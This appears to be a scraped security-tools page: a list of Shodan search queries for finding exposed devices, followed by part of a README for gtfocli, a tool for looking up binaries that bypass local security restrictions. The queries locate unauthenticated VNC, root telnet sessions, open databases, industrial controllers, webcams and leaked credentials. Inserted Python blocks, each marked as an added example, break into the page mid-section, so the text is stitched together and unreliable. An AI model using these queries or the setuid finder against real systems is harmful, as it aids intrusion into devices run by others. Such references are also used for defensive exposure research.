<p><b>Shodan Dorks</b> (KitPloit - PenTest & Hacking Tools, 2024-03-18)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAM AxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div> <h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions.</p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country (two-letter country code). <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by geographic coordinates (latitude,longitude). <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. 
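Every dork on this page is built from the same three pieces: space-separated <code>filter:value</code> terms, quoted banner phrases, and a leading <code>-</code> that negates a term. As an added example (not part of the original dork list), here is a small tokenizer and linter for that syntax; it catches the mistakes that make a query silently return nothing, such as a filter wrapped in quotes (which Shodan then matches as literal banner text), a space between the filter name and its value, a misspelled filter name, or an impossible port. <code>KNOWN_FILTERS</code> is an assumption: it holds only the filter names used on this page, not Shodan's full vocabulary.

```python
"""Tokenize Shodan dorks and flag the mistakes that make them return nothing.
Added example, not part of the original dork list."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: only the filter names used on this page, not Shodan's full
# vocabulary, so "unknown filter" is a hint to double-check, not a verdict.
KNOWN_FILTERS = {
    "city", "country", "geo", "hostname", "net", "org", "asn", "os", "port",
    "before", "after", "device", "product", "cpe", "server", "title", "html",
    "ssl", "ssl.jarm", "ssl.cert.serial", "ssl.cert.expired",
    "ssl.cert.issuer.cn", "ssl.cert.subject.cn", "http.html", "http.title",
    "http.favicon.hash", "http.component", "http.html_hash", "http.status",
    "has_screenshot", "all",
}

# One term: optional '-' negation, optional filter name, then a quoted phrase
# or a bare word. A filter name must be glued to its value with ':'.
_TOKEN = re.compile(
    r'(?P<neg>-?)'
    r'(?:(?P<key>[A-Za-z][\w.-]*):)?'
    r'(?:"(?P<quoted>[^"]*)"|(?P<bare>[^\s"]+))'
)
_LOOKS_LIKE_FILTER = re.compile(r'([A-Za-z][\w.-]*):(\S.*)', re.S)


@dataclass
class Term:
    key: Optional[str]      # filter name, or None for a free-text banner phrase
    value: str              # value with the surrounding quotes removed
    negated: bool = False


@dataclass
class Dork:
    terms: List[Term] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)


def parse_dork(text: str) -> Dork:
    """Split a dork into terms, collecting lint warnings as it goes."""
    dork = Dork()
    if text.count('"') % 2:
        dork.warnings.append("unbalanced double quotes")
    for m in _TOKEN.finditer(text):
        quoted = m.group("quoted") is not None
        value = m.group("quoted") if quoted else m.group("bare")
        term = Term(m.group("key"), value, m.group("neg") == "-")
        dork.terms.append(term)
        _lint_term(term, quoted, dork.warnings)
    return dork


def _lint_term(term: Term, quoted: bool, warnings: List[str]) -> None:
    if term.key is None:
        # Quoted text is matched as a literal banner phrase, so a filter written
        # inside the quotes never acts as a filter.
        looks = _LOOKS_LIKE_FILTER.fullmatch(term.value) if quoted else None
        if looks and looks.group(1).lower() in KNOWN_FILTERS:
            warnings.append(f'"{term.value}" is quoted: it matches the literal text, not the filter')
        elif not quoted and term.value.endswith(":"):
            warnings.append(f"filter '{term.value}' has no attached value (write key:value without a space)")
        return
    if term.key.lower() not in KNOWN_FILTERS:
        warnings.append(f"unknown filter '{term.key}'")
    if term.key.lower() == "port":
        for piece in term.value.split(","):
            if not piece.isdigit() or int(piece) > 65535:
                warnings.append(f"bad port value '{piece}'")


def lint(text: str) -> List[str]:
    """Warnings only; an empty list means the dork is at least well-formed."""
    return parse_dork(text).warnings


def ports(dork: Dork) -> List[int]:
    """Ports the dork requires (comma lists expanded, negated terms skipped)."""
    out: List[int] = []
    for t in dork.terms:
        if t.key and t.key.lower() == "port" and not t.negated:
            out.extend(int(p) for p in t.value.split(",") if p.isdigit())
    return out


if __name__ == "__main__":
    for dork in ('"authentication disabled" port:5900,5901', 'kibana content-legth:217', '"port:502"'):
        print(dork, "->", lint(dork) or "ok")
```

Run it over a saved list of dorks before pasting them into Shodan; anything that comes back with a warning is worth a second look, while an empty list only says the query is well-formed, not that it will match anything.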
<code>server:"gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices in an IP range given as a single address or a CIDR block. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices last seen before or after a given date (dd/mm/yyyy). <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self-signed certificates (issuer and subject are the same name) <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p>Certificates issued for a given name <code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Common Platform Enumeration (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server:nginx</code> <code>server:apache</code> <code>server:microsoft</code> <code>server:cisco-ios</code></p> <h3>SSH fingerprints</h3> <p>A bare key fingerprint is matched against the banner. <code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>product:MySQL</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>product:MongoDB</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana "Content-Length: 217"</code></p> <h3>Elasticsearch</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>product:Memcached</code></p> <h3>CouchDB</h3> <p><code>product:CouchDB</code> <code>port:5984 "Server: CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>port:5432 PostgreSQL</code></p> <h3>Riak</h3> <p><code>port:8087 Riak</code></p> <h3>Redis</h3> <p><code>product:Redis</code></p> <h3>Cassandra</h3> <p><code>product:Cassandra</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to the internet</h3> <p>No authentication required to reach the CLI terminal. 
<code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p><code>"voter system serial" country:US</code></p> <h3>Open ATM</h3> <p>May expose ATM availability over SNMP. <code>NCR port:161</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan also runs a Ship Tracker that maps ship locations in real time.</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access 
Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>html:"PIPS Technology ALPR Processors"</code></p> <h3>Modbus</h3> <p><code>port:502</code></p> <h3>Niagara Fox</h3> <p><code>port:1911,4911 product:Niagara</code></p> <h3>GE-SRTP</h3> <p><code>port:18245,18246 product:"general electric"</code></p> <h3>MELSEC-Q</h3> <p><code>port:5006,5007 product:mitsubishi</code></p> <h3>CODESYS</h3> <p><code>port:2455 "operating system"</code></p> <h3>S7</h3> <p><code>port:102</code></p> <h3>BACnet</h3> <p><code>port:47808</code></p> <h3>HART-IP</h3> <p><code>port:5094 hart-ip</code></p> <h3>Omron FINS</h3> <p><code>port:9600 "response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>port:2404 "asdu address"</code></p> <h3>DNP3</h3> <p><code>port:20000 "source address"</code></p> <h3>EtherNet/IP</h3> <p><code>port:44818</code></p> <h3>PCWorx</h3> <p><code>port:1962 PLC</code></p> <h3>Crimson v3.0</h3> <p><code>port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>port:20547 PLC</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>Nearly all of these (99.99%) still sit behind the Windows logon screen, so exposure alone is not access.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> 
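The <code>ssl.cert.serial</code> dork in this section keys on the default certificate serial number (146473198, which is 0x08BB00EE). The same check can be made locally against a certificate you already hold, or pulled straight from a suspect listener, without third-party libraries: the serial is always the first INTEGER inside tbsCertificate, right after the optional version field. This is an added example, not part of the original dork list; <code>fake_cert</code> builds a constructed certificate fragment so the check runs offline, and <code>fetch_serial</code> is the network path.

```python
"""Read the serial number out of a DER X.509 certificate and compare it with
the Cobalt Strike default. Added example, not part of the original dork list."""
import socket
import ssl

COBALT_STRIKE_DEFAULT_SERIAL = 146473198   # the ssl.cert.serial value from this page


def _read_tlv(buf: bytes, pos: int):
    """Decode one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def serial_from_der(cert: bytes) -> int:
    """Certificate -> tbsCertificate -> [0] version (optional) -> serialNumber (RFC 5280 4.1)."""
    tag, tbs, _ = _read_tlv(cert, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a DER SEQUENCE")
    tag, body, _ = _read_tlv(tbs, 0)
    if tag != 0x30:
        raise ValueError("tbsCertificate is not a DER SEQUENCE")
    tag, value, nxt = _read_tlv(body, 0)
    if tag == 0xA0:                        # EXPLICIT [0] version; absent means v1
        tag, value, nxt = _read_tlv(body, nxt)
    if tag != 0x02:
        raise ValueError("serialNumber is not an INTEGER")
    return int.from_bytes(value, "big", signed=True)


def is_cobalt_strike_default(cert: bytes) -> bool:
    return serial_from_der(cert) == COBALT_STRIKE_DEFAULT_SERIAL


def fetch_serial(host: str, port: int = 443, timeout: float = 5.0) -> int:
    """Grab the leaf certificate from a live listener (network path, not used by the tests)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE        # we want the cert even when it is self-signed
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return serial_from_der(tls.getpeercert(binary_form=True))


# Minimal DER encoder, used only to build the constructed test certificate below.
def _tlv(tag: int, body: bytes) -> bytes:
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _der_int(value: int) -> bytes:
    size = value.bit_length() // 8 + 1     # +1 keeps the sign bit clear for positives
    return _tlv(0x02, value.to_bytes(size, "big", signed=True))


def fake_cert(serial: int) -> bytes:
    """Constructed Certificate/tbsCertificate prefix: v3 version then the serial, nothing else.
    Real certificates carry many more fields, but the serial always comes first."""
    version = _tlv(0xA0, _der_int(2))
    tbs = _tlv(0x30, version + _der_int(serial))
    return _tlv(0x30, tbs)


if __name__ == "__main__":
    print(hex(serial_from_der(fake_cert(COBALT_STRIKE_DEFAULT_SERIAL))))   # 0x8bb00ee
```

The parser stops at the serial on purpose: it reads no names, extensions or signatures, so it is safe to point at untrusted DER. Pair a matching serial with the JARM and <code>product:</code> dorks above before calling a host a team server, since a default serial only says the operator never changed the shipped keystore.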
<code>ssl.cert.serial:146473198</code> (the default certificate serial number) <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers</h3> <p>Routers that have already been compromised and carry this banner. <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins unrestricted dashboards</h3> <p><code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>port:53 "Recursion: enabled"</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access</h3> <p>No password required for telnet access. 
<code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>Android Debug Bridge listening on TCP 5555, a tangential result of Google's sloppy, fractured update approach. 🙄</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p>Excludes the firmware versions that shipped the fix.</p> <p><code>HP-ILO-4 -"HP-ILO-4/2.53" -"HP-ILO-4/2.54" -"HP-ILO-4/2.55" -"HP-ILO-4/2.60" -"HP-ILO-4/2.61" -"HP-ILO-4/2.62" -"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter admin interface without password</h3> <p><code>"Press Enter for Setup Mode" port:9999</code></p> <h3>Wi-Fi Passwords</h3> <p>Finds devices that print their cleartext Wi-Fi password in the banner. 
<code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." 
port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera" "200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams</h3> <p>Commonly shipped with username <code>admin</code> and an empty password. <code>NETSurveillance uc-httpd</code> <code>"Server: uc-httpd 1.0.0"</code></p> <h1>Printers & Copiers</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, 
etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Ethereum Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div><p><b>Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems</b> (KitPloit, 2024-03-12)</p><h2 style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2> <p><code>GTFOcli</code> is a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for quickly looking up binaries whose built-in functions can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> on misconfigured systems.</p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for the binaries listed in a file (bare names and absolute paths are both accepted):</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for windows binaries</h3> 
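The file-list searches (the Unix list above and the Windows list that follows) hand the tool mixed entries: bare names, absolute paths, doubled backslashes and <code>.exe</code> suffixes, and the CTF section at the end of this post feeds it the output of <code>find / -perm -u=s</code>. As an added example, not gtfocli's own code (its real normalization may differ), here is the front half of that workflow in Python: enumerate setuid files the way <code>find</code> does, then reduce each entry to the bare name you would look up in GTFOBins or LOLBAS. Folding Windows names to lowercase is an assumption made here; the sample listings in the test are constructed from the lists shown in this README.

```python
"""Find setuid binaries and turn mixed path/name entries into lookup keys.
Added example; not part of gtfocli, whose own normalization may differ."""
import ntpath
import os
import posixpath
import stat
from typing import Iterator, List


def is_suid_mode(mode: int) -> bool:
    """Regular file with the setuid bit: the same test as find -type f -perm -u=s."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str) -> Iterator[str]:
    """Walk root and yield setuid regular files. lstat is used so symlinks are
    judged by their own mode and never followed out of the tree."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue          # permission denied / vanished: same as find's 2>/dev/null
            if is_suid_mode(st.st_mode):
                yield path


def lookup_key(entry: str, target_os: str = "unix") -> str:
    """Reduce '/bin/tail', 'c:\\\\Users\\\\Runonce.exe' or 'Winget' to the bare name."""
    entry = entry.strip()
    if target_os == "windows":
        # Lists written by hand often double the backslashes; collapse them first.
        name = ntpath.basename(entry.replace("\\\\", "\\"))
        stem, ext = ntpath.splitext(name)
        if ext.lower() == ".exe":
            name = stem
        return name.lower()       # assumption: LOLBAS-style names are matched case-insensitively
    return posixpath.basename(entry)


def keys_from_listing(text: str, target_os: str = "unix") -> List[str]:
    """Deduplicated lookup keys from a file like myBinaryList.txt, in file order.
    Blank lines and '#' comments are skipped."""
    seen: List[str] = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key = lookup_key(line, target_os)
        if key not in seen:
            seen.append(key)
    return seen


if __name__ == "__main__":
    # Equivalent of: find / -type f -perm -u=s 2>/dev/null | gtfocli search
    for path in find_suid("/usr/bin"):
        print(lookup_key(path), "<-", path)
```

The deduplication matters on real systems, where the same binary shows up several times through <code>/bin</code>, <code>/usr/bin</code> and symlink farms; one lookup per name keeps the output readable.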
